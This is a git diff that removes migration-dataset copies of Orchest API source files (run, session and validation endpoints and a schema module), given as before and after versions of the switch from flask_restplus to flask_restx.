-@api.response(404, "Run not found") -class Run(Resource): - @api.doc("get_run") - @api.marshal_with(schema.interactive_run, code=200) - def get(self, run_uuid): - """Fetches an interactive pipeline run given its UUID.""" - run = models.InteractivePipelineRun.query.filter_by( - run_uuid=run_uuid - ).one_or_none() - if run is None: - abort(404, description="Run not found") - return run.__dict__ - - @api.doc("set_run_status") - @api.expect(schema.status_update) - def put(self, run_uuid): - """Sets the status of a pipeline run.""" - post_data = request.get_json() - - res = models.InteractivePipelineRun.query.filter_by(run_uuid=run_uuid).update( - {"status": post_data["status"]} - ) - - if res: - db.session.commit() - - return {"message": "Status was updated successfully"}, 200 - - @api.doc("delete_run") - @api.response(200, "Run terminated") - def delete(self, run_uuid): - """Stops a pipeline run given its UUID.""" - if stop_pipeline_run(run_uuid): - return {"message": "Run termination was successful"}, 200 - else: - return {"message": "Run does not exist or is not running"}, 400 - - -@api.route("//") -@api.param("run_uuid", "UUID of Run") -@api.param("step_uuid", "UUID of Pipeline Step") -@api.response(404, "Pipeline step not found") -class StepStatus(Resource): - @api.doc("get_step_status") - @api.marshal_with(schema.pipeline_run_pipeline_step, code=200) - def get(self, run_uuid, step_uuid): - """Fetches the status of a pipeline step of a specific run.""" - step = models.PipelineRunStep.query.get_or_404( - ident=(run_uuid, step_uuid), - description="Run and step combination not found", - ) - return step.__dict__ - - @api.doc("set_step_status") - @api.expect(schema.status_update) - def put(self, run_uuid, step_uuid): - """Sets the status of a pipeline step.""" - status_update = request.get_json() - - # TODO: first check the status and make sure it says PENDING or - # whatever. Because if is empty then this would write it - # and then get overwritten afterwards with "PENDING". - filter_by = {"run_uuid": run_uuid, "step_uuid": step_uuid} - update_status_db( - status_update, model=models.PipelineRunStep, filter_by=filter_by - ) - - return {"message": "Status was updated successfully"}, 200 - - -def stop_pipeline_run(run_uuid) -> bool: - """Stop a pipeline run. - - The run will cancelled if not running yet, otherwise - it will be aborted. - - Args: - run_uuid: - - Returns: - True if a cancellation was issued to the run, false if the - run did not exist or was not PENDING/STARTED. - """ - interactive_run = models.PipelineRun.query.filter( - models.PipelineRun.status.in_(["PENDING", "STARTED"]), - models.PipelineRun.run_uuid == run_uuid, - ).one_or_none() - if interactive_run is None: - return False - - celery_app = make_celery(current_app) - res = AbortableAsyncResult(run_uuid, app=celery_app) - - # it is responsibility of the task to terminate by reading - # it's aborted status - res.abort() - - celery_app.control.revoke(run_uuid) - # TODO: possibly set status of steps and Run to "ABORTED" - # note that a race condition would be present since the - # task will try to set the status as well - - return True diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.diff deleted file mode 100644 index 9c1a8e5..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_sessions.py b/services/orchest-api/app/app/apis/namespace_sessions.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_sessions.py - +++ b/services/orchest-api/app/app/apis/namespace_sessions.py -@@ -2,7 +2,7 @@ import logging - import sys - - from flask import request --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - - import app.models as models - from app import schema diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.source.py deleted file mode 100644 index e21a7e8..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.source.py +++ /dev/null @@ -1,179 +0,0 @@ -import logging -import sys - -from flask import request -from flask_restplus import Namespace, Resource - -import app.models as models -from app import schema -from app.connections import db, docker_client -from app.core.sessions import InteractiveSession -from app.utils import register_schema - -logging.basicConfig(stream=sys.stdout, level=logging.INFO) - -api = Namespace("sessions", description="Manage interactive sessions") -api = register_schema(api) - - -@api.route("/") -class SessionList(Resource): - @api.doc("fetch_sessions") - @api.marshal_with(schema.sessions) - def get(self): - """Fetches all sessions.""" - query = models.InteractiveSession.query - - # TODO: why is this used instead of the Session.get() ? - # Ability to query a specific session given its `pipeline_uuid` - # through the URL (using `request.args`). - if "pipeline_uuid" in request.args and "project_uuid" in request.args: - query = query.filter_by( - pipeline_uuid=request.args.get("pipeline_uuid") - ).filter_by(project_uuid=request.args.get("project_uuid")) - elif "project_uuid" in request.args: - query = query.filter_by(project_uuid=request.args.get("project_uuid")) - - sessions = query.all() - - return {"sessions": [session.as_dict() for session in sessions]}, 200 - - @api.doc("launch_session") - @api.expect(schema.pipeline) - @api.marshal_with(schema.session, code=201, description="Session launched.") - def post(self): - """Launches an interactive session.""" - post_data = request.get_json() - - # TODO: error handling. If it does not succeed then the initial - # entry has to be removed from the database as otherwise - # no session can be started in the future due to unique - # constraint. - - # Add initial entry to database. - pipeline_uuid = post_data["pipeline_uuid"] - pipeline_path = post_data["pipeline_path"] - project_uuid = post_data["project_uuid"] - - interactive_session = { - "project_uuid": project_uuid, - "pipeline_uuid": pipeline_uuid, - "status": "LAUNCHING", - } - db.session.add(models.InteractiveSession(**interactive_session)) - db.session.commit() - - session = InteractiveSession(docker_client, network="orchest") - session.launch( - pipeline_uuid, - project_uuid, - pipeline_path, - post_data["project_dir"], - post_data["settings"]["data_passing_memory_size"], - post_data["host_userdir"], - ) - - # Update the database entry with information to connect to the - # launched resources. - IP = session.get_containers_IP() - interactive_session.update( - { - "status": "RUNNING", - "container_ids": session.get_container_IDs(), - "jupyter_server_ip": IP.jupyter_server, - "notebook_server_info": session.notebook_server_info, - } - ) - models.InteractiveSession.query.filter_by( - project_uuid=project_uuid, pipeline_uuid=pipeline_uuid - ).update(interactive_session) - db.session.commit() - - return interactive_session, 201 - - -@api.route("//") -@api.param("project_uuid", "UUID of project") -@api.param("pipeline_uuid", "UUID of pipeline") -@api.response(404, "Session not found") -class Session(Resource): - """Manages interactive sessions. - - There can only be 1 interactive session per pipeline. Interactive - sessions are uniquely identified by the pipeline's UUID. - """ - - @api.doc("get_session") - @api.marshal_with(schema.session) - def get(self, project_uuid, pipeline_uuid): - """Fetch a session given the pipeline UUID.""" - session = models.InteractiveSession.query.get_or_404( - ident=(project_uuid, pipeline_uuid), description="Session not found." - ) - return session.as_dict() - - @api.doc("shutdown_session") - @api.response(200, "Session stopped") - @api.response(404, "Session not found") - def delete(self, project_uuid, pipeline_uuid): - """Shutdowns session.""" - if stop_interactive_session(project_uuid, pipeline_uuid): - return {"message": "Session shutdown was successful"}, 200 - else: - return {"message": "Session not found"}, 400 - - @api.doc("restart_memory_server_of_session") - @api.response(200, "Session resource memory-server restarted") - @api.response(404, "Session not found") - def put(self, project_uuid, pipeline_uuid): - """Restarts the memory-server of the session.""" - session = models.InteractiveSession.query.get_or_404( - ident=(project_uuid, pipeline_uuid), description="Session not found" - ) - session_obj = InteractiveSession.from_container_IDs( - docker_client, - container_IDs=session.container_ids, - network="orchest", - notebook_server_info=session.notebook_server_info, - ) - - # Note: The entry in the database does not have to be updated - # since restarting the `memory-server` does not change its - # Docker ID. - session_obj.restart_resource(resource_name="memory-server") - - return {"message": "Session restart was successful"}, 200 - - -def stop_interactive_session(project_uuid, pipeline_uuid) -> bool: - """Stops an interactive session. - - Args: - project_uuid: - pipeline_uuid: - - Returns: - True if the session was stopped, false if no session was found. - """ - session = models.InteractiveSession.query.filter_by( - project_uuid=project_uuid, pipeline_uuid=pipeline_uuid - ).one_or_none() - if session is None: - return False - - session.status = "STOPPING" - db.session.commit() - - session_obj = InteractiveSession.from_container_IDs( - docker_client, - container_IDs=session.container_ids, - network="orchest", - notebook_server_info=session.notebook_server_info, - ) - - # TODO: error handling? - session_obj.shutdown() - - db.session.delete(session) - db.session.commit() - return True diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.target.py deleted file mode 100644 index c7c1b78..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.target.py +++ /dev/null @@ -1,179 +0,0 @@ -import logging -import sys - -from flask import request -from flask_restx import Namespace, Resource - -import app.models as models -from app import schema -from app.connections import db, docker_client -from app.core.sessions import InteractiveSession -from app.utils import register_schema - -logging.basicConfig(stream=sys.stdout, level=logging.INFO) - -api = Namespace("sessions", description="Manage interactive sessions") -api = register_schema(api) - - -@api.route("/") -class SessionList(Resource): - @api.doc("fetch_sessions") - @api.marshal_with(schema.sessions) - def get(self): - """Fetches all sessions.""" - query = models.InteractiveSession.query - - # TODO: why is this used instead of the Session.get() ? - # Ability to query a specific session given its `pipeline_uuid` - # through the URL (using `request.args`). - if "pipeline_uuid" in request.args and "project_uuid" in request.args: - query = query.filter_by( - pipeline_uuid=request.args.get("pipeline_uuid") - ).filter_by(project_uuid=request.args.get("project_uuid")) - elif "project_uuid" in request.args: - query = query.filter_by(project_uuid=request.args.get("project_uuid")) - - sessions = query.all() - - return {"sessions": [session.as_dict() for session in sessions]}, 200 - - @api.doc("launch_session") - @api.expect(schema.pipeline) - @api.marshal_with(schema.session, code=201, description="Session launched.") - def post(self): - """Launches an interactive session.""" - post_data = request.get_json() - - # TODO: error handling. If it does not succeed then the initial - # entry has to be removed from the database as otherwise - # no session can be started in the future due to unique - # constraint. - - # Add initial entry to database. - pipeline_uuid = post_data["pipeline_uuid"] - pipeline_path = post_data["pipeline_path"] - project_uuid = post_data["project_uuid"] - - interactive_session = { - "project_uuid": project_uuid, - "pipeline_uuid": pipeline_uuid, - "status": "LAUNCHING", - } - db.session.add(models.InteractiveSession(**interactive_session)) - db.session.commit() - - session = InteractiveSession(docker_client, network="orchest") - session.launch( - pipeline_uuid, - project_uuid, - pipeline_path, - post_data["project_dir"], - post_data["settings"]["data_passing_memory_size"], - post_data["host_userdir"], - ) - - # Update the database entry with information to connect to the - # launched resources. - IP = session.get_containers_IP() - interactive_session.update( - { - "status": "RUNNING", - "container_ids": session.get_container_IDs(), - "jupyter_server_ip": IP.jupyter_server, - "notebook_server_info": session.notebook_server_info, - } - ) - models.InteractiveSession.query.filter_by( - project_uuid=project_uuid, pipeline_uuid=pipeline_uuid - ).update(interactive_session) - db.session.commit() - - return interactive_session, 201 - - -@api.route("//") -@api.param("project_uuid", "UUID of project") -@api.param("pipeline_uuid", "UUID of pipeline") -@api.response(404, "Session not found") -class Session(Resource): - """Manages interactive sessions. - - There can only be 1 interactive session per pipeline. Interactive - sessions are uniquely identified by the pipeline's UUID. - """ - - @api.doc("get_session") - @api.marshal_with(schema.session) - def get(self, project_uuid, pipeline_uuid): - """Fetch a session given the pipeline UUID.""" - session = models.InteractiveSession.query.get_or_404( - ident=(project_uuid, pipeline_uuid), description="Session not found." - ) - return session.as_dict() - - @api.doc("shutdown_session") - @api.response(200, "Session stopped") - @api.response(404, "Session not found") - def delete(self, project_uuid, pipeline_uuid): - """Shutdowns session.""" - if stop_interactive_session(project_uuid, pipeline_uuid): - return {"message": "Session shutdown was successful"}, 200 - else: - return {"message": "Session not found"}, 400 - - @api.doc("restart_memory_server_of_session") - @api.response(200, "Session resource memory-server restarted") - @api.response(404, "Session not found") - def put(self, project_uuid, pipeline_uuid): - """Restarts the memory-server of the session.""" - session = models.InteractiveSession.query.get_or_404( - ident=(project_uuid, pipeline_uuid), description="Session not found" - ) - session_obj = InteractiveSession.from_container_IDs( - docker_client, - container_IDs=session.container_ids, - network="orchest", - notebook_server_info=session.notebook_server_info, - ) - - # Note: The entry in the database does not have to be updated - # since restarting the `memory-server` does not change its - # Docker ID. - session_obj.restart_resource(resource_name="memory-server") - - return {"message": "Session restart was successful"}, 200 - - -def stop_interactive_session(project_uuid, pipeline_uuid) -> bool: - """Stops an interactive session. - - Args: - project_uuid: - pipeline_uuid: - - Returns: - True if the session was stopped, false if no session was found. - """ - session = models.InteractiveSession.query.filter_by( - project_uuid=project_uuid, pipeline_uuid=pipeline_uuid - ).one_or_none() - if session is None: - return False - - session.status = "STOPPING" - db.session.commit() - - session_obj = InteractiveSession.from_container_IDs( - docker_client, - container_IDs=session.container_ids, - network="orchest", - notebook_server_info=session.notebook_server_info, - ) - - # TODO: error handling? - session_obj.shutdown() - - db.session.delete(session) - db.session.commit() - return True diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.diff deleted file mode 100644 index 00ba131..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_validations.py b/services/orchest-api/app/app/apis/namespace_validations.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_validations.py - +++ b/services/orchest-api/app/app/apis/namespace_validations.py -@@ -4,7 +4,7 @@ from typing import Optional, Tuple - - import docker - from flask import request --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - - import app.models as models - from _orchest.internals import config as _config diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.source.py deleted file mode 100644 index 854efdb..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.source.py +++ /dev/null @@ -1,103 +0,0 @@ -"""API endpoint to do system level validations.""" - -from typing import Optional, Tuple - -import docker -from flask import request -from flask_restplus import Namespace, Resource - -import app.models as models -from _orchest.internals import config as _config -from app import schema -from app.connections import docker_client -from app.utils import register_schema - -api = Namespace("validations", description="Validates system requirements") -api = register_schema(api) - - -def validate_environment(project_uuid: str, env_uuid: str) -> Tuple[str, Optional[str]]: - """Validates whether the environments exist on the system. - - Only passes if the condition below is satisfied: - * The image: ``_config.ENVIRONMENT_IMAGE_NAME`` exists in the - docker namespace. - - Args: - project_uuid: Project UUID for which the environment should - exist. - env_uuid: Environment UUID to check. - - Returns: - (check, action) - - `check` is "pass" or "fail". - - `action` is one of ["BUILD", "WAIT", "RETRY", None] - - """ - # Check the docker namespace. - docker_image_name = _config.ENVIRONMENT_IMAGE_NAME.format( - project_uuid=project_uuid, environment_uuid=env_uuid - ) - try: - docker_client.images.get(docker_image_name) - except docker.errors.ImageNotFound: - # Check the build history for the environment to determine the - # action. - env_builds = models.EnvironmentBuild.query.filter_by( - project_uuid=project_uuid, environment_uuid=env_uuid - ) - num_building_builds = env_builds.filter( - models.EnvironmentBuild.status.in_(["PENDING", "STARTED"]) - ).count() - - if num_building_builds: - return "fail", "WAIT" - else: - return "fail", "BUILD" - - except docker.errors.APIError: - # We cannot determine what happened, so better be safe than - # sorry. - return "fail", "RETRY" - - return "pass", None - - -@api.route("/environments") -class Gate(Resource): - @api.doc("validate_environments") - @api.expect(schema.validation_environments) - @api.marshal_with( - schema.validation_environments_result, - code=201, - description="Validation of environments", - ) - def post(self): - """Checks whether the given environments have been built and are ready. - - NOTE: The order of ``["fail"]`` and ``["action"]`` indicates the - required action to convert the "fail" to a "pass". - - """ - post_data = request.get_json() - environment_uuids = post_data["environment_uuids"] - project_uuid = post_data["project_uuid"] - - res = { - "validation": None, # Will be set last - "fail": [], - "actions": [], - "pass": [], - } - for env_uuid in environment_uuids: - # Check will be either "fail" or "pass". - validation, action = validate_environment(project_uuid, env_uuid) - res[validation].append(env_uuid) - - if validation == "fail": - res["actions"].append(action) - - res["validation"] = "fail" if len(res["fail"]) != 0 else "pass" - return res, 201 diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.target.py deleted file mode 100644 index 333c856..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.target.py +++ /dev/null @@ -1,103 +0,0 @@ -"""API endpoint to do system level validations.""" - -from typing import Optional, Tuple - -import docker -from flask import request -from flask_restx import Namespace, Resource - -import app.models as models -from _orchest.internals import config as _config -from app import schema -from app.connections import docker_client -from app.utils import register_schema - -api = Namespace("validations", description="Validates system requirements") -api = register_schema(api) - - -def validate_environment(project_uuid: str, env_uuid: str) -> Tuple[str, Optional[str]]: - """Validates whether the environments exist on the system. - - Only passes if the condition below is satisfied: - * The image: ``_config.ENVIRONMENT_IMAGE_NAME`` exists in the - docker namespace. - - Args: - project_uuid: Project UUID for which the environment should - exist. - env_uuid: Environment UUID to check. - - Returns: - (check, action) - - `check` is "pass" or "fail". - - `action` is one of ["BUILD", "WAIT", "RETRY", None] - - """ - # Check the docker namespace. - docker_image_name = _config.ENVIRONMENT_IMAGE_NAME.format( - project_uuid=project_uuid, environment_uuid=env_uuid - ) - try: - docker_client.images.get(docker_image_name) - except docker.errors.ImageNotFound: - # Check the build history for the environment to determine the - # action. - env_builds = models.EnvironmentBuild.query.filter_by( - project_uuid=project_uuid, environment_uuid=env_uuid - ) - num_building_builds = env_builds.filter( - models.EnvironmentBuild.status.in_(["PENDING", "STARTED"]) - ).count() - - if num_building_builds: - return "fail", "WAIT" - else: - return "fail", "BUILD" - - except docker.errors.APIError: - # We cannot determine what happened, so better be safe than - # sorry. - return "fail", "RETRY" - - return "pass", None - - -@api.route("/environments") -class Gate(Resource): - @api.doc("validate_environments") - @api.expect(schema.validation_environments) - @api.marshal_with( - schema.validation_environments_result, - code=201, - description="Validation of environments", - ) - def post(self): - """Checks whether the given environments have been built and are ready. - - NOTE: The order of ``["fail"]`` and ``["action"]`` indicates the - required action to convert the "fail" to a "pass". - - """ - post_data = request.get_json() - environment_uuids = post_data["environment_uuids"] - project_uuid = post_data["project_uuid"] - - res = { - "validation": None, # Will be set last - "fail": [], - "actions": [], - "pass": [], - } - for env_uuid in environment_uuids: - # Check will be either "fail" or "pass". - validation, action = validate_environment(project_uuid, env_uuid) - res[validation].append(env_uuid) - - if validation == "fail": - res["actions"].append(action) - - res["validation"] = "fail" if len(res["fail"]) != 0 else "pass" - return res, 201 diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.diff deleted file mode 100644 index 4e170c8..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/schema.py b/services/orchest-api/app/app/schema.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/schema.py - +++ b/services/orchest-api/app/app/schema.py -@@ -6,7 +6,7 @@ TODO: - to share attributes? - - """ --from flask_restplus import Model, fields -+from flask_restx import Model, fields - - from _orchest.internals import config as _config - diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.source.py deleted file mode 100644 index 9a8e1db..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.source.py +++ /dev/null @@ -1,383 +0,0 @@ -""" - -TODO: - * Would be amazing if we did not have to maintain a schema here and - also a seperate but exactly similar database model. Is there a way - to share attributes? - -""" -from flask_restplus import Model, fields - -from _orchest.internals import config as _config - -# Namespace: Sessions -server = Model( - "Server", - { - "port": fields.Integer( - required=True, default=8888, description="Port to access the server" - ), - "base_url": fields.String(required=True, default="/", description="Base URL"), - }, -) - -session = Model( - "Session", - { - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "status": fields.String(required=True, description="Status of session"), - "jupyter_server_ip": fields.String( - required=True, description="IP of the jupyter-server" - ), - "notebook_server_info": fields.Nested( - server, required=True, description="Jupyter notebook server connection info" - ), - }, -) - -sessions = Model( - "Sessions", - { - "sessions": fields.List( - fields.Nested(session), description="Currently running sessions" - ) - }, -) - -pipeline = Model( - "Pipeline", - { - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "pipeline_path": fields.String( - required=True, description="Path to pipeline file" - ), - "project_dir": fields.String( - required=True, description="Path to pipeline files" - ), - "host_userdir": fields.String( - required=True, description="Host path to userdir" - ), - "settings": fields.Raw( - required=True, description="Settings from the pipeline definition" - ), - }, -) - -# Namespace: Runs & Experiments -pipeline_run_config = Model( - "PipelineRunConfig", - { - "project_dir": fields.String( - required=True, description="Path to project files" - ), - "pipeline_path": fields.String( - required=True, description="Path to pipeline file" - ), - }, -) - -pipeline_run_spec = Model( - "PipelineRunSpec", - { - "uuids": fields.List( - fields.String(), required=False, description="UUIDs of pipeline steps" - ), - "project_uuid": fields.String(required=True, description="UUID of project"), - "run_type": fields.String( - required=False, - default="full", # TODO: check whether default is used if required=False - description="Type of run", - enum=["full", "selection", "incoming"], - ), - }, -) - -pipeline_run_pipeline_step = Model( - "PipelineRunPipelineStep", - { - "run_uuid": fields.String(required=True, description="UUID of the run"), - "step_uuid": fields.String( - required=True, description="UUID of the pipeline step" - ), - "status": fields.String( - required=True, - description="Status of the step", - enum=["PENDING", "STARTED", "SUCCESS", "FAILURE", "ABORTED", "REVOKED"], - ), - "started_time": fields.String( - required=True, description="Time at which the step started executing" - ), - "finished_time": fields.String( - required=True, description="Time at which the step finished executing" - ), - }, -) - -pipeline_run = Model( - "Run", - { - "run_uuid": fields.String(required=True, description="UUID of run"), - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "status": fields.String(required=True, description="Status of the run"), - "pipeline_steps": fields.List( # TODO: rename - fields.Nested(pipeline_run_pipeline_step), - description="Status of each pipeline step", - ), - }, -) - -interactive_run_config = pipeline_run_config.inherit("InteractiveRunConfig", {}) - -interactive_run_spec = pipeline_run_spec.inherit( - "InteractiveRunSpec", - { - "pipeline_definition": fields.Raw( - required=True, description="Pipeline definition in JSON" - ), - "run_config": fields.Nested( - interactive_run_config, - required=True, - description="Configuration for compute backend", - ), - }, -) - -interactive_run = pipeline_run.inherit("InteractiveRun", {}) - -interactive_runs = Model( - "InteractiveRuns", - { - "runs": fields.List( - fields.Nested(interactive_run), - description='All ran interactive runs during this "lifecycle" of Orchest', - ) - }, -) - -status_update = Model( - "StatusUpdate", - { - "status": fields.String( - required=True, - description="New status of executable, e.g. pipeline or step", - enum=["PENDING", "STARTED", "SUCCESS", "FAILURE", "ABORTED", "REVOKED"], - ), - }, -) - -# Namespace: Experiments. -non_interactive_run_config = pipeline_run_config.inherit( - "NonInteractiveRunConfig", - { - # Needed for the celery-worker to set the new project-dir for - # experiments. Note that the `orchest-webserver` has this value - # stored in the ENV variable `HOST_USER_DIR`. - "host_user_dir": fields.String( - required=True, description="Path to the /userdir on the host" - ), - }, -) - -non_interactive_run_spec = pipeline_run_spec.inherit( - "NonInteractiveRunSpec", - { - "run_config": fields.Nested( - non_interactive_run_config, - required=True, - description="Configuration for compute backend", - ), - "scheduled_start": fields.String( # TODO: make DateTime - required=False, - # default=datetime.utcnow().isoformat(), - description="Time at which the run is scheduled to start", - ), - }, -) - -non_interactive_run = pipeline_run.inherit( - "NonInteractiveRun", - { - "experiment_uuid": fields.String( - required=True, description="UUID for experiment" - ), - "pipeline_run_id": fields.Integer( - required=True, description="Respective run ID in experiment" - ), - }, -) - -experiment_spec = Model( - "ExperimentSpecification", - { - "experiment_uuid": fields.String( - required=True, description="UUID for experiment" - ), - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "pipeline_definitions": fields.List( - fields.Raw(description="Pipeline definition in JSON"), - required=True, - description="Collection of pipeline definitions", - ), - "pipeline_run_ids": fields.List( - fields.Integer( - description=( - "Pipeline index corresponding to respective " - "list entries in pipeline_definitions." - ) - ), - required=True, - description="Collection of pipeline definition indices.", - ), - "pipeline_run_spec": fields.Nested( - non_interactive_run_spec, - required=True, - description='Specification of the pipeline runs, e.g. "full", "incoming" etc', - ), - "scheduled_start": fields.String( - required=True, - description="Time at which the experiment is scheduled to start", - ), - }, -) - -experiment = Model( - "Experiment", - { - "experiment_uuid": fields.String( - required=True, description="UUID for experiment" - ), - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "total_number_of_pipeline_runs": fields.Integer( - required=True, - description="Total number of pipeline runs part of the experiment", - ), - "pipeline_runs": fields.List( - fields.Nested(non_interactive_run), - description="Collection of pipeline runs part of the experiment", - ), - "scheduled_start": fields.String( - required=True, - description="Time at which the experiment is scheduled to start", - ), - "completed_pipeline_runs": fields.Integer( - required=True, - default=0, - description="Number of completed pipeline runs part of the experiment", - ), - }, -) - -experiments = Model( - "Experiments", - { - "experiments": fields.List( - fields.Nested(experiment), description="Collection of all experiments" - ), - }, -) - -environment_build = Model( - "EnvironmentBuild", - { - "build_uuid": fields.String( - required=True, description="UUID of the environment build" - ), - "project_uuid": fields.String(required=True, description="UUID of the project"), - "environment_uuid": fields.String( - required=True, description="UUID of the environment" - ), - "project_path": fields.String(required=True, description="Project path"), - "requested_time": fields.String( - required=True, description="Time at which the build was requested" - ), - "started_time": fields.String( - required=True, description="Time at which the build started executing" - ), - "finished_time": fields.String( - required=True, description="Time at which the build finished executing" - ), - "status": fields.String( - required=True, - description="Status of the build", - enum=["PENDING", "STARTED", "SUCCESS", "FAILURE", "ABORTED"], - ), - }, -) - -environment_builds = Model( - "EnvironmentBuilds", - { - "environment_builds": fields.List( - fields.Nested(environment_build), - description="Collection of environment_builds", - ), - }, -) - -environment_build_request = Model( - "EnvironmentBuildRequest", - { - "project_uuid": fields.String(required=True, description="UUID of the project"), - "environment_uuid": fields.String( - required=True, description="UUID of the environment" - ), - "project_path": fields.String(required=True, description="Project path"), - }, -) - -environment_build_requests = Model( - "EnvironmentBuildRequests", - { - "environment_build_requests": fields.List( - fields.Nested(environment_build_request), - description="Collection of environment_build_request", - unique=True, - ), - }, -) - -validation_environments = Model( - "GateCheck", - { - "project_uuid": fields.String( - required=True, - description="The project UUID", - ), - "environment_uuids": fields.List( - fields.String(), - required=False, - description="UUIDs to check", - ), - }, -) - -validation_environments_result = Model( - "GateCheckResult", - { - "validation": fields.String( - required=True, - description="Whether the gate check passed or failed", - enum=["pass", "fail"], - ), - "fail": fields.List( - fields.String(), - required=True, - description="Environment UUIDs that failed the validation", - ), - "actions": fields.List( - fields.String(enum=["WAIT", "BUILD", "RETRY"]), - required=True, - description="Action to convert environment 'fail' to 'pass'", - ), - "pass": fields.List( - fields.String(), - required=True, - description="Environment UUIDs that passed the validation", - ), - }, -) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.target.py deleted file mode 100644 index df30aaf..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.target.py +++ /dev/null @@ -1,383 +0,0 @@ -""" - -TODO: - * Would be amazing if we did not have to maintain a schema here and - also a seperate but exactly similar database model. Is there a way - to share attributes? - -""" -from flask_restx import Model, fields - -from _orchest.internals import config as _config - -# Namespace: Sessions -server = Model( - "Server", - { - "port": fields.Integer( - required=True, default=8888, description="Port to access the server" - ), - "base_url": fields.String(required=True, default="/", description="Base URL"), - }, -) - -session = Model( - "Session", - { - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "status": fields.String(required=True, description="Status of session"), - "jupyter_server_ip": fields.String( - required=True, description="IP of the jupyter-server" - ), - "notebook_server_info": fields.Nested( - server, required=True, description="Jupyter notebook server connection info" - ), - }, -) - -sessions = Model( - "Sessions", - { - "sessions": fields.List( - fields.Nested(session), description="Currently running sessions" - ) - }, -) - -pipeline = Model( - "Pipeline", - { - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "pipeline_path": fields.String( - required=True, description="Path to pipeline file" - ), - "project_dir": fields.String( - required=True, description="Path to pipeline files" - ), - "host_userdir": fields.String( - required=True, description="Host path to userdir" - ), - "settings": fields.Raw( - required=True, description="Settings from the pipeline definition" - ), - }, -) - -# Namespace: Runs & Experiments -pipeline_run_config = Model( - "PipelineRunConfig", - { - "project_dir": fields.String( - required=True, description="Path to project files" - ), - "pipeline_path": fields.String( - required=True, description="Path to pipeline file" - ), - }, -) - -pipeline_run_spec = Model( - "PipelineRunSpec", - { - "uuids": fields.List( - fields.String(), required=False, description="UUIDs of pipeline steps" - ), - "project_uuid": fields.String(required=True, description="UUID of project"), - "run_type": fields.String( - required=False, - default="full", # TODO: check whether default is used if required=False - description="Type of run", - enum=["full", "selection", "incoming"], - ), - }, -) - -pipeline_run_pipeline_step = Model( - "PipelineRunPipelineStep", - { - "run_uuid": fields.String(required=True, description="UUID of the run"), - "step_uuid": fields.String( - required=True, description="UUID of the pipeline step" - ), - "status": 